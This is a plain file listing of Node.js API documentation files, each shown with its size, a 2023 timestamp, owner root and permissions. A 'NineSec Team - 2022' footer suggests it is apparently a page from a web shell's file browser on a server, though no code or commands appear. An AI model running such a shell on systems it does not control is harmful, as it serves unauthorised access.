errors.json.gz
41.519 KB
August 09 2023 12:32:55
root
0644
errors.md
94.822 KB
August 09 2023 12:32:55
root
0644
esm.html
125.451 KB
August 09 2023 12:32:55
root
0644
esm.json.gz
20.241 KB
August 09 2023 12:32:55
root
0644
esm.md
58.762 KB
August 09 2023 12:32:55
root
0644
events.html
186.533 KB
August 09 2023 12:32:55
root
0644
events.json.gz
15.857 KB
August 09 2023 12:32:55
root
0644
events.md
55.578 KB
August 09 2023 12:32:55
root
0644
fs.html
585.922 KB
August 09 2023 12:32:55
root
0644
fs.json.gz
63.869 KB
August 09 2023 12:32:55
root
0644
fs.md
227.271 KB
August 09 2023 12:32:55
root
0644
globals.html
54.78 KB
August 09 2023 12:32:55
root
0644
globals.json.gz
5.521 KB
August 09 2023 12:32:55
root
0644
globals.md
13.758 KB
August 09 2023 12:32:55
root
0644
http.html
257.352 KB
August 09 2023 12:32:55
root
0644
http.json.gz
33.471 KB
August 09 2023 12:32:55
root
0644
http.md
99.305 KB
August 09 2023 12:32:55
root
0644
http2.html
310.105 KB
August 09 2023 12:32:55
root
0644
http2.json.gz
38.246 KB
August 09 2023 12:32:55
root
0644
http2.md
126.901 KB
August 09 2023 12:32:55
root
0644
https.html
54.206 KB
August 09 2023 12:32:55
root
0644
https.json.gz
5.581 KB
August 09 2023 12:32:55
root
0644
https.md
15.709 KB
August 09 2023 12:32:55
root
0644
index.html
12.408 KB
August 09 2023 12:32:55
root
0644
index.json
0.053 KB
August 09 2023 12:32:55
root
0644
index.md
1.905 KB
August 09 2023 12:32:55
root
0644
inspector.html
32.761 KB
August 09 2023 12:32:55
root
0644
inspector.json.gz
3.355 KB
August 09 2023 12:32:55
root
0644
inspector.md
6.931 KB
August 09 2023 12:32:55
root
0644
intl.html
31.391 KB
August 09 2023 12:32:55
root
0644
intl.json.gz
3.865 KB
August 09 2023 12:32:55
root
0644
intl.md
10.715 KB
August 09 2023 12:32:55
root
0644
module.html
30.263 KB
August 09 2023 12:32:55
root
0644
module.json.gz
2.667 KB
August 09 2023 12:32:55
root
0644
module.md
5.03 KB
August 09 2023 12:32:55
root
0644
modules.html
79.392 KB
August 09 2023 12:32:55
root
0644
modules.json.gz
12.682 KB
August 09 2023 12:32:55
root
0644
modules.md
33.09 KB
August 09 2023 12:32:55
root
0644
n-api.html
383.687 KB
August 09 2023 12:32:55
root
0644
n-api.json.gz
49.905 KB
August 09 2023 12:32:55
root
0644
n-api.md
212.467 KB
August 09 2023 12:32:55
root
0644
net.html
135.688 KB
August 09 2023 12:32:55
root
0644
net.json.gz
16.709 KB
August 09 2023 12:32:55
root
0644
net.md
47.822 KB
August 09 2023 12:32:55
root
0644
os.html
69.783 KB
August 09 2023 12:32:55
root
0644
os.json.gz
8.566 KB
August 09 2023 12:32:55
root
0644
os.md
34.489 KB
August 09 2023 12:32:55
root
0644
packages.html
98.842 KB
August 09 2023 12:32:55
root
0644
packages.json.gz
15.398 KB
August 09 2023 12:32:55
root
0644
packages.md
46.294 KB
August 09 2023 12:32:55
root
0644
path.html
51.026 KB
August 09 2023 12:32:55
root
0644
path.json.gz
4.9 KB
August 09 2023 12:32:55
root
0644
path.md
14.905 KB
August 09 2023 12:32:55
root
0644
perf_hooks.html
136.052 KB
August 09 2023 12:32:55
root
0644
perf_hooks.json.gz
12.18 KB
August 09 2023 12:32:55
root
0644
perf_hooks.md
40.914 KB
August 09 2023 12:32:55
root
0644
permissions.html
43.819 KB
August 09 2023 12:32:55
root
0644
permissions.json.gz
5.438 KB
August 09 2023 12:32:55
root
0644
permissions.md
14.591 KB
August 09 2023 12:32:55
root
0644
policy.html
13.945 KB
August 09 2023 12:32:55
root
0644
policy.json
0.464 KB
August 09 2023 12:32:55
root
0644
policy.md
0.216 KB
August 09 2023 12:32:55
root
0644
process.html
283.726 KB
August 09 2023 12:32:55
root
0644
process.json.gz
30.81 KB
August 09 2023 12:32:55
root
0644
process.md
105.606 KB
August 09 2023 12:32:55
root
0644
punycode.html
25.688 KB
August 09 2023 12:32:55
root
0644
punycode.json.gz
1.995 KB
August 09 2023 12:32:55
root
0644
punycode.md
4.175 KB
August 09 2023 12:32:55
root
0644
querystring.html
27.652 KB
August 09 2023 12:32:55
root
0644
querystring.json.gz
2.62 KB
August 09 2023 12:32:55
root
0644
querystring.md
5.504 KB
August 09 2023 12:32:55
root
0644
readline.html
78.159 KB
August 09 2023 12:32:55
root
0644
readline.json.gz
9.782 KB
August 09 2023 12:32:55
root
0644
readline.md
28.027 KB
August 09 2023 12:32:55
root
0644
repl.html
67.367 KB
August 09 2023 12:32:55
root
0644
repl.json.gz
9.993 KB
August 09 2023 12:32:55
root
0644
repl.md
23.665 KB
August 09 2023 12:32:55
root
0644
report.html
78.951 KB
August 09 2023 12:32:55
root
0644
report.json.gz
6.198 KB
August 09 2023 12:32:55
root
0644
report.md
18.202 KB
August 09 2023 12:32:55
root
0644
stream.html
346.823 KB
August 09 2023 12:32:55
root
0644
stream.json.gz
46.987 KB
August 09 2023 12:32:55
root
0644
stream.md
133.766 KB
August 09 2023 12:32:55
root
0644
string_decoder.html
22.827 KB
August 09 2023 12:32:55
root
0644
string_decoder.json.gz
1.545 KB
August 09 2023 12:32:55
root
0644
string_decoder.md
2.957 KB
August 09 2023 12:32:55
root
0644
synopsis.html
19.031 KB
August 09 2023 12:32:55
root
0644
synopsis.json
2.956 KB
August 09 2023 12:32:55
root
0644
synopsis.md
2.117 KB
August 09 2023 12:32:55
root
0644
test.html
85.498 KB
August 09 2023 12:32:55
root
0644
test.json.gz
8.704 KB
August 09 2023 12:32:55
root
0644
test.md
28.898 KB
August 09 2023 12:32:55
root
0644
timers.html
54.066 KB
August 09 2023 12:32:55
root
0644
timers.json.gz
5.042 KB
August 09 2023 12:32:55
root
0644
timers.md
14.62 KB
August 09 2023 12:32:55
root
0644
tls.html
174.438 KB
August 09 2023 12:32:55
root
0644
tls.json.gz
31.448 KB
August 09 2023 12:32:55
root
0644
tls.md
85.361 KB
August 09 2023 12:32:55
root
0644
tracing.html
33.333 KB
August 09 2023 12:32:55
root
0644
tracing.json.gz
3.4 KB
August 09 2023 12:32:55
root
0644
tracing.md
8.229 KB
August 09 2023 12:32:55
root
0644
tty.html
36.365 KB
August 09 2023 12:32:55
root
0644
tty.json.gz
3.66 KB
August 09 2023 12:32:55
root
0644
tty.md
8.777 KB
August 09 2023 12:32:55
root
0644
url.html
144.705 KB
August 09 2023 12:32:55
root
0644
url.json.gz
15.334 KB
August 09 2023 12:32:55
root
0644
url.md
52.175 KB
August 09 2023 12:32:55
root
0644
util.html
241.566 KB
August 09 2023 12:32:55
root
0644
util.json.gz
23.489 KB
August 09 2023 12:32:55
root
0644
util.md
85.895 KB
August 09 2023 12:32:55
root
0644
v8.html
96.239 KB
August 09 2023 12:32:55
root
0644
v8.json.gz
10.732 KB
August 09 2023 12:32:55
root
0644
v8.md
30.479 KB
August 09 2023 12:32:55
root
0644
vm.html
138.64 KB
August 09 2023 12:32:55
root
0644
vm.json.gz
16.511 KB
August 09 2023 12:32:55
root
0644
vm.md
58.484 KB
August 09 2023 12:32:55
root
0644
wasi.html
27.627 KB
August 09 2023 12:32:55
root
0644
wasi.json.gz
2.897 KB
August 09 2023 12:32:55
root
0644
wasi.md
6.621 KB
August 09 2023 12:32:55
root
0644
webcrypto.html
147.224 KB
August 09 2023 12:32:55
root
0644
webcrypto.json.gz
9.508 KB
August 09 2023 12:32:55
root
0644
webcrypto.md
41.691 KB
August 09 2023 12:32:55
root
0644
webstreams.html
142.197 KB
August 09 2023 12:32:55
root
0644
webstreams.json.gz
9.602 KB
August 09 2023 12:32:55
root
0644
webstreams.md
33.873 KB
August 09 2023 12:32:55
root
0644
worker_threads.html
111.69 KB
August 09 2023 12:32:55
root
0644
worker_threads.json.gz
14.308 KB
August 09 2023 12:32:55
root
0644
worker_threads.md
42.578 KB
August 09 2023 12:32:55
root
0644
zlib.html
108.132 KB
August 09 2023 12:32:55
root
0644
zlib.json.gz
10.342 KB
August 09 2023 12:32:55
root
0644
zlib.md
35.097 KB
August 09 2023 12:32:55
root
0644

NineSec Team - 2022